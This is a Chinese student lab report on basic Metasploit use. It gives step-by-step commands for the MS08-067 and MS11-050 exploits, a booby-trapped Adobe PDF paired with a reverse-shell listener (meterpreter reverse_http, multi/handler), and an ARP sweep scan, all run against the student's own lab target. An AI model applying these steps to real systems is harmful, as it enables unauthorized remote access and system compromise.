您的位置:首页 > 理论基础 > 计算机网络

20145318《网络对抗》MSF基础应用

2017-04-16 22:34 246 查看

20145318 《网络对抗》 MSF基础应用

实验内容

掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路。具体需要完成(1)一个主动攻击,如ms08_067;(2)一个针对浏览器的攻击,如ms11_050;(3)一个针对客户端的攻击,如Adobe(4)成功应用任何一个辅助模块

基础问题回答

exploit:通过漏洞对程序攻击的途径,是一种手段或通道。

payload:具体的攻击代码

encode:伪装、隐藏

实践过程

主动攻击:MS08_067漏洞渗透攻击

开启MSF

查询ms08_067漏洞



进入漏洞模块的应用,显示当前漏洞有效载荷



设置载荷,配置攻击机和靶机的IP地址参数



exploit,等待攻击成功



针对浏览器:MS11-050安全漏洞

开启msf

确定相应模块名之后,我们使用该模块。使用命令
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
进入模块

使用命令
info
查看该模块的具体信息



设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令
set payloads windows/meterpreter/reverse_http


使用
show options
查看具体参数设置



使用命令
exploit
攻击,等待连接,漏洞主机访问该ip,被攻击主机打开病毒网址效果为:



针对客户端:Adobe阅读器渗透攻击

开启msf

进入渗透模块应用,设置有效载荷



使用命令
exploit
生成
5318.pdf




使用命令
cp 5318.pdf /root/5318.pdf
将其复制到根目录下



重新进入msf平台



使用命令
use exploit/multi/handler
进入监听模式,设置好参数,执行
exploit
等待被攻击者的接听。



连接成功



应用辅助模块:利用nmap扫描

使用命令
msfconsole
开启msf

输入命令
use auxiliary/scanner/discovery/arp_sweep
进入模块



用show options查看需要设置的消息

根据显示的消息进行设置,设置相关参数



使用命令run开启扫描,结果如下



使用命令nmap+ip地址(该ip地址为同网段下另一个电脑主机ip)结果如下

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: